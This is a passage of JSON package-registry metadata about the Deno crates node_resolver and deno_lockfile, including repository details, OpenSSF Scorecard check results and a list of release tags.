.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/node_resolver/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/node_resolver/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/node_resolver/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/node_resolver/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/node_resolver/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/node_resolver/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T22:29:20.014Z","updated_at":"2022-11-07T22:29:20.014Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-27T21:06:29.547Z","updated_at":"2023-07-27T21:06:29.547Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5930094,"name":"deno_lockfile","ecosystem":"cargo","description":"An implementation of a lockfile used in Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":78,"first_release_published_at":"2023-01-23T15:16:53.044Z","latest_release_published_at":"2026-08-06T11:46:18.559Z","latest_release_number":"0.59.0","last_synced_at":"2026-08-29T21:57:58.266Z","created_at":"2023-01-23T15:18:18.518Z","updated_at":"2026-08-29T21:57:58.267Z","registry_url":"https://crates.io/crates/deno_lockfile/","install_command":"cargo install deno_lockfile","documentation_url":"https://docs.rs/deno_lockfile/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.m